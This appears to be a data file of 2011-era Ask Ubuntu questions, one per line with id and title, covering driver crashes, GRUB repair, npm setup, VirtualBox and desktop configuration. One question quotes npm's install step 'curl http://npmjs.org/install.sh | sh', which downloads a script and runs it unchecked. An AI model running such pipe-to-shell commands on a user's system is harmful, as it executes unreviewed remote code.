51519	why does my radeon driver crash when booting ?	i am trying to install natty on an acer aspire 5810t laptop . everything works fine once booted , but the laptop will only boot one out of three times . the other times it hangs at a black screen with an error concerning the radeon driver . it is possible however to change to a console using [ crtl ] + [ alt ] + [ f2 ] but x wo n't start and the system hangs on an attempt to do a `` sudo reboot '' and needs to be killed . could you take a look at the dmesg output ? maybe you can tell me what is going on . dmesg on crash : http : //pastebin.com/nv83yx3c dmesg on successful boot : http : //pastebin.com/r1q60xkb interesting : my aspire 5810t has two graphic cards , onboard intel and a mobility radeon . details : 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 01:00.0 vga compatible controller : ati technologies inc m92 lp [ mobility radeon hd 4300 series ] windows switches between the two depending if the computer is plugged in or on battery , ubuntu uses only the radeon card . i already tried : installing the fglrx driver . it does n't install correctly and i ca n't use unity . switching off the intel card in the bios ( ati card ca n't be switched off ) , the problem persists . i 'd appreciate any pointers to solve this situation . thanks in advance !
51522	java application + subpixel rendering	how i can enable subpixel rendering in java applications like netbeans ?
51525	getting a new hard drive - running linux/windows in a virtual machine	i do n't want this to turn into an argument about linux/windows . please try to answer this objectively i 'm getting a new hard drive today and my current setup ( on this machine ) is running windows with linux in a virtualbox virtual machine . i am wondering if i could achieve better performance/compatibility if i ran linux with windows in a virtual machine , as there are some ubuntu features that do not work in a virtual machine ( such as playing fullscreen games ) . are there some windows features that would not work if i ran windows in a virtual machine ? which setup is better ? running linux in a virtual machine ; or windows in a virtual machine ?
51526	what is wrong with my ubuntu download ?	i 'm stuck at this place : '' grub-install/dev/sda '' its saying that the bootloader is not downloaded . what should i do ?
51533	how to convert a mac utf-8 .xml file into something that banshee understands ?	i 've been trying to import my itunes library to banshee but banshee will not find songs that contain latin accents . it imports most songs just fine except the ones that contains accents like é , è , ç , ñ and so on ... it says `` file do not exists '' although the file is in my hd and the accents display correctly in nautilus and also displays correctly in banshee error report ! i found the issue in bugzilla but the reply was that this is not a banshee bug and the problem might come from the file being originated in a mac ( ? ) . i also posted in ubuntuforums but no reply so far ... i 've tried to `` save-as '' the mac .xml file into ubuntu software hoping it would encode it correctly but nothing seems to work . my last attempt was using the utf-8 migration tool ( from software center ) but is says : your current encoding was not found , or you are using the c locale . please pick a supported language from /usr/share/i18n/supported and log in again . ( no idea what this means , my system is now configured to en_us.utf-8 ) anyone here can help me out understanding this ?
51535	how to fix this `` new tab '' issue in chromium ?	when i open a new tab in chromium it switches to another open window in the same workspace only ! . and it happens using ( ctrl+t ) , the plus icon , or any other opened tab . what i 've done recently : i 've edited chromium.deskop in ~/.local/share/applications , to make a static quick-lists . i 've added the daily ppa for chromium ( maybe because it is in development ? ) . chromium version : chromium 14.0.808.0 ubuntu 11.04 . i 've fully removed chromium and installed it again , but it did n't work . i did n't touch ccsm , only the unity plugin . how can i fix it ?
51538	when will the next lts version of ubuntu be released ?	i am a bit confused about the release schedule of ubuntu . afaik , it releases a new version every 6 months right ? how about the lts version ?
51544	recommendations for music games for children	can anyone recommend some good music games for small children ? i thought something like a virtual piano or drum , but with a very simple gui . my girls are three and six , and they already love to play tuxpaint , i am looking for something similar for music .
51550	panel opacity should change the indicators ' menu opacity , is this a valid bug ?	in ubuntu 11.04 with unity 3.8.16-0ubuntu1~natty1 when clicking an indicator its icon turns opaque and the menu shown is also opaque , regardless of the panel opacity value . i think both the icon when clicked and the menu should follow the value set by panel opacity in ccsm . is this a valid bug ?
51551	problems with conky 's $ { eval }	i 'm trying to do something with $ { eval } in conky , but i 'm having problems even with a minimal example : $ { eval $ { exec echo ' $ { font dejavu sans mono : size=6 } hey ! ' } } as far as i understand , i would believe that i should see the string `` hey ! '' printed with the 'dejavu sans mono ' font , but instead i 'm getting this as output : $ { font dejavu sans mono : size=6 } hey ! i want to be able to execute something as i would in the terminal , and then parse that as a conky statement . is n't the whole idea of $ eval to parse that string again ? if so , am i doing something wrong , am i misunderstanding how it works , or is that a bug in $ eval ?
51552	`` can not find module 'semver ' '' error when installing npm ?	i 'm trying to install this : http : //npmjs.org/ following the recommended step , curl http : //npmjs.org/install.sh | sh the script just hangs . if i instead execute the script using sudo bash -x install.sh i get this : + ' [ ' xinstall.sh = xsh ' ] ' + ' [ ' x = x ' ] ' ++ which node + node=/usr/local/bin/node + ret=0 + ' [ ' 0 -ne 0 ' ] ' + ' [ ' -x /usr/local/bin/node ' ] ' + tmp= + ' [ ' x = x ' ] ' + tmp=/tmp + tmp=/tmp/npm.10925 + rm -rf /tmp/npm.10925 + mkdir /tmp/npm.10925 + ' [ ' 0 -ne 0 ' ] ' + back=/home/mat + tar= + ' [ ' -z '' ' ] ' + tar=tar ++ which gegrep + egrep= + ' [ ' 1 -ne 0 ' ] ' + egrep=egrep ++ which gmake + make= + ' [ ' 1 -ne 0 ' ] ' ++ which make + make=/usr/bin/make + ' [ ' 0 -ne 0 ' ] ' + ' [ ' -x /usr/bin/make ' ] ' + t= + ' [ ' -z '' ' ] ' + t=latest ++ head -n 1 ++ egrep -o 'tarball '' : '' [ ^ '' ] +' ++ egrep -o 'http : // . *' ++ curl -s -l http : //registry.npmjs.org/npm/latest + url=http : //registry.npmjs.org/npm/-/npm-1.0.15.tgz + echo 'fetching : http : //registry.npmjs.org/npm/-/npm-1.0.15.tgz' fetching : http : //registry.npmjs.org/npm/-/npm-1.0.15.tgz + ret=0 + ' [ ' 0 -ne 0 ' ] ' + cd /tmp/npm.10925 + tar -xf - + curl -s -l http : //registry.npmjs.org/npm/-/npm-1.0.15.tgz + gzip -- decompress -- stdout + cd package ++ /usr/local/bin/node -- version + node_version=v0.5.0-pre + ret=0 + ' [ ' 0 -eq 0 ' ] ' ++ /usr/local/bin/node bin/read-package-json.js package.json engines.node my node version is v0.5.0-pre . if i try installing from the git repo , i get this error when running the configure script node.js:183 throw e ; // process.nexttick error , or 'error ' event on first tick ^ error : can not find module 'semver' at function._resolvefilename ( module.js:322:11 ) at function._load ( module.js:267:25 ) at require ( module.js:367:19 ) at object. < anonymous > ( /home/mat/npm/lib/utils/config-defs.js:8:14 ) at module._compile ( module.js:423:26 ) at object..js ( module.js:429:10 ) at module.load ( module.js:339:31 ) at function._load ( module.js:298:12 ) at require ( module.js:367:19 ) at object. < anonymous > ( /home/mat/npm/lib/utils/ini.js:43:18 ) and if i just run sudo make install it hangs after printing node cli.js install -g -f
51557	how to record streaming camera video and auto-erase old data before drive fills up ?	i 'm interested in making my own home cctv system using ubuntu . i want to get network cameras similar to this : http : //cgi.ebay.co.uk/ws/ebayisapi.dll ? viewitem & item=260745150596 i want a way to dump or record the live stream to a large hard drive , but have ubuntu automatically delete the oldest parts of the video while the drive fills , so it can continue recording new data continuously . how can this auto-delete while recording be accomplished ? i 've searched and searched .
51559	is there a way to force kalarm to start minimized in the notification area ?	i was having issues with gnome-schedule , so i 've switched to kalarm . i have it running as a startup application in ubuntu 10.10 ; however , it starts as a regular program and is open on the desktop upon boot . here 's the command line that 's in startup applications : kalarm -- tray -caption `` % c '' % i would love for this start minimized in the notifcation/tray area instead of having to manually do this ...
51561	autostarting applications with xmonad & ubuntu	i have recently started to try xmonad and i 'm loving it , so far i 've managed to set-up xmobar with it . however , i 'm stuck on how to autostart applications , so far i 've got both an .xinitrc contains # ! /bin/bash xrdb -merge .xresources if [ -x /usr/bin/nm-applet ] ; then nm-applet fi if [ -x /usr/bin/gnome-power-manager ] ; then sleep 3 gnome-power-manager fi exec xmonad that is it , what am i doing wrong ? thanks for any help !
51564	setting desktop wallpaper via terminal	is it possible to set the desktop wallpaper in ubuntu 11.04 via a terminal command ? i 've been searching for about two hours but did n't find anything related to this . in ubuntu 10.04 i did it with gconftool-2 -t str -- set /desktop/gnome/background/picture_filename but it does n't work with 11.04 .
51567	why does /var/cache/apt/archives keep deleting files	i normally download all .deb packages and just copy the packages from /var/cache/apt/archives directory to the rest of the computers , saving me to have to download all the updates and programs again . but since ubuntu 11.04 , the directory keeps deleting the oldest file or some kind of delete method that literally resets the amount of packages there . so then i need to download them agina on the rest of the pcs . the files stay there for a couple of days but then `` magic '' not there anymore after some days . so what do i need to do to tell ubuntu not to eliminate any files from /var/cache/apt/archives , not even the previous versions of the same package . i do not want for it to delete anything from there . just to add , i install packages using aptitude or synaptic .
51572	why should i use gksudo for gtk apps instead of sudo ?	i read somewhere that people should use gksudo for applications that use the gtk gui instead of sudo ? what 's the reasoning for this ?
51580	why does n't chrome or firefox auto-highlight the address bar ?	in windows , when you click on the address bar , it automatically highlights all of the web address so you can enter another one without having to drag across everything . i 've noticed that it does n't do that in chrome or firefox ( i do n't know about other browsers ) . this is very annoying , especially when the site has a long address that goes past the end of the address bar . how can i fix this ?
51582	logging into skype breaks wireless connection	i 'm running ubuntu 10.04 and just installed skype . whenever i try to sign into skype , my internet connection breaks . i remain connected to my wifi network but ca n't connect to the internet . the login hangs a while , i ca n't go anywhere in a browser or even ping a known host . the only thing that helps is uninstalling and restarting the computer . i 've uninstalled skype for now , but does anyone have any ideas ?
51584	bundle of important softwares	is there any bundle of softwares to download in a package for free ? i want software for everyday use and for general programming development . edit editor and other required programs to run php , c , c++ , java . a music & video player , an image editor .
51586	how do i run .net programs ?	as .net is os independent how can i run programs built/compiled on .net 4.0 ? can i develop software in ubuntu for .net 4.0 [ if yes , what i need to download , link ] ?
51587	hide files and folders which are hidden in windows	how can i hide files and folder in ubuntu so files and folders which are hidden in windows are also hidden in ubuntu ?
51591	where are system images located ?	i understand where theme images are located , but those are only controls like minimize and maximize and close . where are all of the images in ubuntu located ? pretty much all control images . i know they are `` controlled '' by engines but where are the engines located and where are their images ? also , where are the unity images located ? i want to change up the look because the transparent gray is n't working for me . thankyou for any and all help !
51594	screen keeps freezing , then kernel panic	i have a hp dv6-3079tx . it has a ati radeon graphics chip . the system seems to randomly freeze up , sometimes it will unfreeze , other times it will un-freeze , freeze , then go black . looking in the full log with this exerpt . jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907266 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907303 ] warning : at /build/buildd/linux-2.6.38/drivers/gpu/drm/radeon/radeon_fence.c:248 radeon_fence_wait+0x36f/0x3e0 [ radeon ] ( ) jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907309 ] hardware name : hp pavilion dv6 notebook pc jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907314 ] gpu lockup ( waiting for 0x0005418f last fence id 0x00054188 ) jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907318 ] modules linked in : usb_storage uas cryptd aes_x86_64 aes_generic binfmt_misc parport_pc ppdev snd_hda_codec_hdmi snd_hda_codec_idt snd_hda_intel snd_hda_codec snd_hwdep snd_seq_midi arc4 snd_pcm snd_rawmidi ath9k snd_seq_midi_event snd_seq snd_timer radeon snd_seq_device hp_wmi ttm mac80211 sparse_keymap uvcvideo ath9k_common ath9k_hw i7core_edac ath psmouse snd edac_core videodev joydev v4l2_compat_ioctl32 cfg80211 serio_raw drm_kms_helper drm soundcore snd_page_alloc i2c_algo_bit hp_accel lis3lv02d video input_polldev lp parport usbhid hid ahci r8169 libahci jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907393 ] pid : 1592 , comm : gnome-shell not tainted 2.6.38-8-generic # 42-ubuntu jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907398 ] call trace : jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907409 ] [ < ffffffff81065cef > ] ? warn_slowpath_common+0x7f/0xc0 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907417 ] [ < ffffffff81065de6 > ] ? warn_slowpath_fmt+0x46/0x50 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907447 ] [ < ffffffffa03076df > ] ? radeon_fence_wait+0x36f/0x3e0 [ radeon ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907456 ] [ < ffffffff81087f30 > ] ? autoremove_wake_function+0x0/0x40 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907486 ] [ < ffffffffa0307fc1 > ] ? radeon_sync_obj_wait+0x11/0x20 [ radeon ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907499 ] [ < ffffffffa01cdb0d > ] ? ttm_bo_wait+0xfd/0x1b0 [ ttm ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907512 ] [ < ffffffffa01d07e6 > ] ? ttm_bo_move_accel_cleanup+0x1c6/0x260 [ ttm ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907542 ] [ < ffffffffa030827f > ] ? radeon_move_blit.clone.0+0x11f/0x180 [ radeon ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907572 ] [ < ffffffffa0308595 > ] ? radeon_move_ram_vram.clone.2+0x125/0x150 [ radeon ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907580 ] [ < ffffffff81124507 > ] ? vma_prio_tree_next+0x47/0x70 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907592 ] [ < ffffffffa01d33db > ] ? ttm_eu_list_ref_sub+0x3b/0x60 [ ttm ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907622 ] [ < ffffffffa03087a8 > ] ? radeon_bo_move+0x1e8/0x1f0 [ radeon ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907635 ] [ < ffffffffa01ce89e > ] ? ttm_bo_handle_move_mem+0x12e/0x3d0 [ ttm ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907647 ] [ < ffffffffa01cf982 > ] ? ttm_bo_move_buffer+0x142/0x160 [ ttm ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907659 ] [ < ffffffffa01d33db > ] ? ttm_eu_list_ref_sub+0x3b/0x60 [ ttm ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907671 ] [ < ffffffffa01cfa36 > ] ? ttm_bo_validate+0x96/0x120 [ ttm ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907700 ] [ < ffffffffa030974c > ] ? radeon_bo_list_validate+0x7c/0xe0 [ radeon ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907735 ] [ < ffffffffa03225d6 > ] ? radeon_cs_parser_relocs+0x236/0x270 [ radeon ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907770 ] [ < ffffffffa0322a61 > ] ? radeon_cs_ioctl+0xa1/0x1e0 [ radeon ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907778 ] [ < ffffffff81134b53 > ] ? vma_link+0xc3/0x100 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907795 ] [ < ffffffffa00b3384 > ] ? drm_ioctl+0x3e4/0x4c0 [ drm ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907830 ] [ < ffffffffa03229c0 > ] ? radeon_cs_ioctl+0x0/0x1e0 [ radeon ] jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907840 ] [ < ffffffff8117648f > ] ? do_vfs_ioctl+0x8f/0x360 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907847 ] [ < ffffffff811767f1 > ] ? sys_ioctl+0x91/0xa0 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907855 ] [ < ffffffff8100c002 > ] ? system_call_fastpath+0x16/0x1b jul 3 16:15:23 hailwood-ubu kernel : [ 4211.907860 ] -- - [ end trace ff6b61aa2bd9f6b5 ] -- - jul 3 16:15:23 hailwood-ubu kernel : [ 4211.909135 ] radeon 0000:01:00.0 : gpu softreset jul 3 16:15:23 hailwood-ubu kernel : [ 4211.909140 ] radeon 0000:01:00.0 : grbm_status=0xf5702828 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.909145 ] radeon 0000:01:00.0 : grbm_status_se0=0xfc000005 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.909151 ] radeon 0000:01:00.0 : grbm_status_se1=0x00000007 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.909156 ] radeon 0000:01:00.0 : srbm_status=0x20000ac0 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.909187 ] radeon 0000:01:00.0 : grbm_soft_reset=0x00007f6b jul 3 16:15:23 hailwood-ubu kernel : [ 4211.909294 ] radeon 0000:01:00.0 : grbm_status=0x00003828 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.909299 ] radeon 0000:01:00.0 : grbm_status_se0=0x00000007 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.909304 ] radeon 0000:01:00.0 : grbm_status_se1=0x00000007 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.909309 ] radeon 0000:01:00.0 : srbm_status=0x200000c0 jul 3 16:15:23 hailwood-ubu kernel : [ 4211.910317 ] radeon 0000:01:00.0 : gpu reset succeed jul 3 16:15:23 hailwood-ubu kernel : [ 4211.951371 ] radeon 0000:01:00.0 : wb enabled jul 3 16:15:23 hailwood-ubu kernel : [ 4211.968136 ] [ drm ] ring test succeeded in 2 usecs jul 3 16:15:23 hailwood-ubu kernel : [ 4211.968153 ] [ drm ] ib test succeeded in 3 usecs jul 3 16:15:34 hailwood-ubu kernel : [ 4223.287726 ] radeon 0000:01:00.0 : gpu lockup cp stall for more than 10020msec it looks like my graphics chip is having some issues . can anyone tell me what is happening ?
51596	why do n't my quicklists appear when i use unity 2d ?	for reference , i 'm currently using ubuntu 11.04 running on an asus eeepc 1001ha , running unity-2d . i 've been trying to add quicklists into my unity launcher , following instructions from this askubuntu question . so what i do is i : copy the requested *.desktop file from /usr/share/applications/ to ~/.local/share/applications/ . make my edits . logout and login again to reflect the new changes . this does n't work -- the quicklists does n't appear when i right-click them . what i do next is ... open nautilus , and find the *.desktop file . right-click the launcher icon i want to replace , and select `` remove from launcher '' . drag the *.desktop files i want to use on launcher directly . the icon appears , but the quicklist does n't , when i right-click the icon . this persists even after restarts . as an example , here 's my google-chrome.desktop file : [ desktop entry ] version=1.0 name=google chrome # only kde 4 seems to use genericname , so we reuse the kde strings . # from ubuntu 's language-pack-kde-xx-base packages , version 9.04-20090413 . genericname=web browser # not translated in kde , from epiphany 2.26.1-0ubuntu1 . genericname [ fil ] =web browser # gnome and kde 3 uses comment . comment=access the internet exec=/opt/google/chrome/google-chrome onlyshowin=gnome ; unity terminal=false icon=google-chrome type=application categories=network ; webbrowser ; mimetype=text/html ; text/xml ; application/xhtml_xml ; x-scheme-handler/http ; x-scheme-handler/https ; x-scheme-handler/ftp ; x-ayatana-desktop-shortcuts=newwindow ; incognito ; [ newwindow shortcut group ] name=new window exec=google-chrome targetenvironment=unity [ incognito shortcut group ] name=new incognito window exec=google-chrome -- incognito targetenvironment=unity i definitely know that dragging the *.desktop file to the launcher works -- if i change the exec directive to include -- incognito , the browser does launch in incognito mode . but for some strange reason the quicklist does n't appear . is this there an issue with how my unity-2d is set up , or are n't quicklists supported by unity-2d ?
51603	notify-osd and libnotify : how do they cooperate ?	i want to help out with some ubuntu dev and i have chosen a `` papercut '' that affects the notify-osd project . however , i am confused as i am not sure what installing notify-osd does as the actual daemon ( notify-send ) is installed from the libnotify package . can someone shed some light on how these fit together ? thanks
51607	i have installed gnome3 and now ca n't login . how can i login from console ?	i have installed gnome3 from the gnome3 ppa and after restart no window interface is appearing . i have installed lxde , gnome classic and unity 2d . when i 've installed gnome3 i was in the unity 2d session and i think that this has been broken and now does n't let me to login . after boot i enter in safe mode and from the console i want to change the log in environment to lxde and after that to give logout and choose gnome3 . how can i enter in lxde ( or directly in gnome3 ) from console/terminal ? btw gdm start gives me an error !
51611	how to convert a bootable cd iso image into a bootable dvd	is it possible to convert a bootable cd iso image into a bootable dvd ? the iso image in this case is ubuntu 10.04.2 desktop ...
51615	how to enable mobile broadband ?	i used to use mobile to connect via usb . recently i have upgraded to ubuntu 11.04 . now i can not enable the mobile broadband . when ever i am enabling by checking the mobile it automatically getting disabled . it was working fine with the other version like 10.04 and 10.10 . can any one tell me how to enable mobile broadband . thanking you a.paul .
51618	how to lower the temperature of my hdd ?	my hdd is reaching a very high temperature , aprox . 50째 , while using ubuntu . on windows it only gets as high as 40째 and it causes the touchpad to get hot . what can i do to determine what is causing this behaviour and how can i cool off my drive ? my notebook is a toshiba a300-2d4 with an ati mobility radeon hd 3470 graphics card .
51621	screen goes into power saving mode on boot up	i have an annoying problem in that when i turn my computer on my monitor ( an lg flatron ) immediately goes into power saving mode and i can see nothing but a black screen , apart from occasional flashes as the boot up process continues . this necessitates me having to use the reset button numerous times until i `` get lucky '' and actually manage to see the screen and log in as normal . sometimes this process can take 15 to 20 minutes . once logged in with a visible screen , however , there is no problem . i can even restart the system without problems . the problem only occurs when the computer is turned on for the first time , e.g . in the morning after having been switched off all night . can anyone suggest what the problem might be ?
51624	how to re-start a python script without killing other python processes	i develop an app called unity mail . a quicklist option «edit accounts data» needs to restart it . file /usr/bin/unity-mail : # ! /bin/sh python /usr/share/unity-mail/unity-mail.py $ @ file /usr/share/unity-mail/unity-mail.py : ( main python script ) when i try to terminate the script using killall unity-mail , the unity-mail process is killed , but python process is still running , so unity-mail is active . i tried to put the python script directly to /usr/bin/unity-mail , but calling killall unity-mail in that case says «unity-mail : no process found» . the question : how should i modify /usr/bin/unity-mail so that killing it will kill python also ?
51626	lexmark 705 pro install	i am trying to install lexmark 705pro printer that is wireless . when i go to install the drivers is ask 's for admin password . i enter the password that works for installing software and everything else but it says incorrect password . i have no other password on the system . any suggestions ?
51627	grub command showing on system boot	i installed windows on dual boot machine with ubuntu , so i lost ubuntu . i wanted to get that dual screen boot menu back so just followed this link https : //help.ubuntu.com/community/recoveringubuntuafterinstallingwindows and as explained , i executed the command sudo grub-install -- root-directory=/media/0d104aff-ec8c-44c8-b811-92b993823444 /dev/sda instead of sudo grub-install -- root-directory=/media/0d104aff-ec8c-44c8-b811-92b993823444 /dev/sda6 on booting , my machine shows the screen with grub commands like : grub > _ please help me . what should i do ? i think i installed grub on /dev/sda instead of /dev/sda6 . how do i remove grub from /dev/sda ? solution : i did not read the above link completely , at the end of the page it is mentioned what should be done in this particular case . i just used ubuntu 9.04 live cd and got it working..thanks every one for ur time .
51629	packages installed within a certain time frame	could someone please help me with how i can list the packages that were manually installed within a certain time frame . for instance , if i want to see a list of packages that were manually installed in the past 2 months..how may i go about doing it ? than you
51643	can not log into ubuntu 10.04.2 lts	i am fairly new to ubuntu and do n't know how to fix this ! so basically this is what happened . i was surfing the internet , when suddenly everything stopped , which is very rare on ubuntu ! i waited for 10 minutes and nothing happened , so i decided to restart the laptop and that 's where the problem started . when the computer restarted , the log in was different ! it was a black screen with my name in the middle and a white bar at the bottom of the screen with the options `` shut down '' , `` restart '' and `` hibernate '' . and it said on the top right corner of the screen install error ! your gnome power manager is n't configured . please contact the administrator of the computer ! so i tried logging in , and i was bought back to the login screen . ( the one i just explained ) . so i tried installing the program from my disk . it was all good . it even asked me to import the things from my mucked up account ! so i logged into the new account and i found nothing there ! and so i restarted the computer and chose the account ( thats the mucked up one ) . and it was the same ! in the disk analyser it said i still had the files but i cant get to them ! so what do i do ? thanks in advance and please tell me the solution because lots of my family pics are on that account and i do n't want to lose them ! ps . i am 15 , so please try to keep everything brief ! pps . the mucked account has the following ubuntu `` ubuntu 10.04.2 lts '' again thanks in advance and it would be appreciated if this problem is solved !
51645	if i have a fullscreen flash video on one screen why ca n't i type in the other ?	i can not watch youtube or other flash videos on fullscreen on the external monitor plugged into my laptop and type on the other screen , since the fullscreen video will go back to small screen if i try typing on the other screen . is there a way to fix this ?
51646	how to debug grayed out vpn connection in network manager ?	i 've added a new pptp vpn connection under network manager - > vpn connections - > configure vpn . now the connection is listed under `` vpn connections '' , but it 's grayed out . how can i debug this ? whatever i 've tried does n't seem to help : checked the logs -- no clues , toggled 'available to all users ' , toggled 'connect automatically ' , logged in and out a few times , etc . it would be nice if network manager did n't gray the item out when it detects some configuration problems , but let me click the item and show some error message after that . network-manager-pptp and network-manager-pptp-gnome are both installed . upd : i can not reproduce the problem right now : it has cured itself it seems . still i 'd be grateful for debugging ideas if it happens again . i 'd rather avoid running gdb against network-manager , which seems to be the ultimate way to solve this .
51649	unable to run sakis3g after downgrading to gnome 2 ?	after downgrading to gnome 2 from gnome 3 in ubuntu 11.04 i was unable to run sakis3g . whenever i run it nothing open up . yes i have checked to execute the script in permissions . i was able to open it before upgrading to gnome 3. error message ** ( zenity:3386 ) : warning ** : could not load ui file /usr/share/zenity/zenity.ui : failed to open file '/usr/share/zenity/zenity.ui ' : no such file or directory ** ( zenity:3471 ) : warning ** : could not load ui file /usr/share/zenity/zenity.ui : failed to open file '/usr/share/zenity/zenity.ui ' : no such file or directory
51650	bug making it difficult to delete themes ?	i had installed some themes , elementary and aldabra and deleted them in the appearance window . but when i click customize ... the window-content and -border of these themes were still showing up . i had to delete the files in ~/.themes by hand . is this a bug ?
51652	how to disable cd drive check after resuming from suspend ?	after resuming from suspend , my laptop performs a check on the cd drive . i currently do not use it that much , so i am wondering if there is a way i can disable the said check after my laptop resumes its status from suspend mode ? i have looked at how it suspends , but i do n't know what program i should look at in /usr/lib/pm-utils/sleep.d .
51654	automatically insert date into filename	is there a simple way ( maybe a script ) , to automatically insert the current date into the filename of a newly created document either in nautilus or in libreoffice ? a function like that would be useful for me , since i produce a lot of documents and sort them by making their names start with the date of their creation .
51657	can i install distributions from within ubuntu ? ( to a different part of the drive , i mean )	i would like to install more than just a few distributions and i would like to avoid spending the time to install them one by one , having my system practically non operational for half a day - or more . is there any way to install them while i am still running ubuntu ?
51658	ca n't restart or power off on an asus 2400	computer asus 2400 does not turn off or restart in 11.04 , and display the wallpaper without anything more and do not respond the turn off button of the computer ( the system is configured to start turn off if the power button is quick pressed ) . the same thing happens when in terminal i enter a command like shutdown now -h or -r. it works fine in fedora 15 . i use to log off the section and force turn of the power supply ( pressing more than 4 s the power button ) .
51661	ubuntuone hungup trying to load a deleted file . not in trash	deleted a book from calibre but ubuntuone is still trying to load the deleted file . checked the trash can and deleted the file from there . this is preventing ubuntuone from completing the backup . where else can i find deleted files ? have not located this file in ubuntuone . thanks in advance cliff
51663	2.6.38-10 stops booting	11.04 natty narwhale ( 2.6.38-10 ) stop boot . after work with : gparted , palimpsest , mountmanager . sda : sda1 ntfs flag : boot windows 7 mbr sda2 ntfs sda3 extended flag : lba ( ? ) sda5 ntfs sda6 ext4 ubuntu 11.04 sda4 ext4 stops after : uhci_hcd 0000:00:1d.0 : unlink after no-irq ? controller is probably using the wrong irq another time ( after edit in grub 1.98 with `` c '' or `` e '' ) : begin : running /scripts/local-bottom ... done . done . begin : running /scripts/init-bottom ... done . or usbhid : usb hid core driver init : plymouth main process ( 256 ) terminated with status 1 init : plymouth-splash main process ( 885 ) terminated with status 2 or ata7 : sata link down ( sstatus 0 scontrol 300 ) ata8 : sata link down ( sstatus 0 scontrol 300 ) how can i boot it ? thank you . i can boot to windows . i already tried unplug every devices except keyboard ps2 , sda with system and monitor dvi . bios is the newest one for this motherboard .
51677	can use unetbootin to install other linux distributions from within ubuntu ( like fedora or mint ) ?	i read that this is possible , and suggested it as a possible solution for someone else , but i 'm curious as to if it is actually advisable ( as i might just try it ) . i might even try running 11.10 on my system this way . is it worth the risk to do this ?
51682	how can i force the installation of the virtualbox extension pack ?	i 'm having a big probelm with virtualbox , everytime i try to add or install the newest extension pack it gives an error , at first it asked me to add my user to the vboxuser group , which i already did , but still ca n't install the extensions pack . how can i force virtualbox to install it ? it says , failed to install extension pack . the path to the file , and the error itself . here i tried running it on the root terminal , but virtualbox crashes . uri-ms-7267 uri # virtualbox qt critical : qt-subapplication ( 20282 ) /kdeui ( kiconloader ) : error : standard icon theme `` oxygen '' not found ! qt warning : qpainter : :begin : paint device returned engine == 0 , type : 3 qt warning : qpainter : :setcompositionmode : painter not active qt warning : qpainter : :end : painter not active , aborted qt warning : qpainter : :begin : paint device returned engine == 0 , type : 3 qt warning : qpainter : :setcompositionmode : painter not active qt warning : qpainter : :end : painter not active , aborted segementation fault when trying to install the extpack from the terminal i get this : uri @ uri-ms-7267 ~ $ sudo vboxmanage extpack install oracle_vm_virtualbox_extension_pack-4.0.10- 72436.vbox-extpack 0 % ... progress state : ns_error_failure vboxmanage : error : failed to install `` /home/uri/oracle_vm_virtualbox_extension_pack- 4.0.10-72436.vbox-extpack '' : the installer failed with exit code 1 : vboxextpackhelperapp : error : the owner is not root : '/usr/lib' and i get nothing when using gksu . uri @ uri-ms-7267 ~ $ gksu vboxmanage extpack install oracle_vm_virtualbox_extension_pack-4.0.10-72436.vbox-extpack uri @ uri-ms-7267 ~ $
51689	what is piii_sse and what its function is ?	yesterday when i turned off the splash of ubuntu , i saw some interesting messages were printed on the screen when the system was booting . xor : automatically using best checksumming function : piii_sse piii_sse : 5651.000 mb/sec i did search google , but i still could n't find what piii_sse definitely is . i know it 's a checksuming function , so what it is checksuming for ? what does 5651.000 mb/sec mean ? and i use athlon , why kernel uses piii_sse ?
51690	installation in my hp compaq 6715b	for some reason , after installation of ubuntu 11.04 on my hp compaq 6715b , i attempted to login and in the middle of the process , the computer halts and noting happens afterwards . i 'm forced to start the computer in safe mode . apparently , the new desktop features are unable to load .
